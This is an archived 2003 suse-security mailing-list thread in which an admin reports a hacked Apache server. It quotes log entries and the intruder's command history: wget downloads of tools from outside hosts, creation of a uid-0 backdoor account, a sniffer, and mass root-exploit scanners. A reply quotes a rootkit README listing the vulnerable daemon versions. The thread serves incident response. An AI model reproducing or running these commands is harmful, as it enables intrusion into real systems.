quote from "boom.tar.gz" (see if you find somethin' that sounds familiar): WARNING, this is a powerfull tool you can gain root access on many systems. Use it at your own risk. It scans for vulnerabilities in different OS and daemons: The BIND scan: Gains root access on all nonpatched boxes running linux with the following bind versions: ISC BIND 8.2 ISC BIND 8.2.1 ISC BIND 8.2.2 ISC BIND 8.2.2-P3 ISC BIND 8.2.2-P5 ISC BIND 8.2.2-P7 The LPD scan: Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd from distribution. The FTPD scan: Gains root access on all nonpatched boxes running the following OS/ftp daemons: Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm] Debian potato [wu-ftpd_2.6.0-3.deb] Debian potato [wu-ftpd_2.6.0-5.1.deb] Debian potato [wu-ftpd_2.6.0-5.3.deb] Debian sid [wu-ftpd_2.6.1-5_i386.deb] Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] SuSE 7.0 [wuftpd.rpm] SuSE 7.0 wu-2.4.2 [wuftpd.rpm] SuSE 7.1 [wuftpd.rpm] SuSE 7.1 wu-2.4.2 [wuftpd.rpm] SuSE 7.2 [wuftpd.rpm] SuSE 7.2 wu-2.4.2 [wuftpd.rpm] SuSE 7.3 [wuftpd.rpm] SuSE 7.3 wu-2.4.2 [wuftpd.rpm] Slackware 7.1 The SSHD scan: Gains root access on all nonpatched boxes running the followin versions: Linux: SSH-1.5-1.2.25 SSH-1.5-1.2.26 SSH-1.5-1.2.27 SSH-1.5-1.2.30 SSH-1.5-1.2.31 SSH-1.99-OpenSSH_2.2.0p1 SSH-1.5-OpenSSH-1.2 SSH-1.5-OpenSSH-1.2.2 SSH-1.5-OpenSSH-1.2.3 OpenBSD 3.x: OpenSSH 2.9.9 - 33 The RPC scan: Gains root access on multiple RPC vulnerabilities involving Linus/SunOS/Solaris. The TELNED scan: Gains root access on all nonpatched boxes running the following OS's: Most of the BSD OS's The POP3 scan: Gains root access on all nonpatched boxes running QPOP 3.0b For further upgrades send me new exploits at k1net1c@k1net1c.net The SSL scan: Gains access on almost all linux boxes running OpenSSL 0.9.6d and older. Spawns a shell uid=apache. ----- Original Message ----- From: "Radu Voicu" <suse@ploiesti.rdsnet.ro> To: "Marco Lum" <marco@hkservice.com>; "suse-security" <suse-security@suse.com> Sent: Wednesday, September 03, 2003 7:53 PM Subject: Re: [suse-security] Apache Gain Remote Shell Access
curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan Andrei :)
----- Original Message ----- From: "Marco Lum" <marco@hkservice.com> To: "suse-security" <suse-security@suse.com> Sent: Wednesday, September 03, 2003 7:43 PM Subject: [suse-security] Apache Gain Remote Shell Access
Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100%
13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100%
65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100%
3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100%
13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here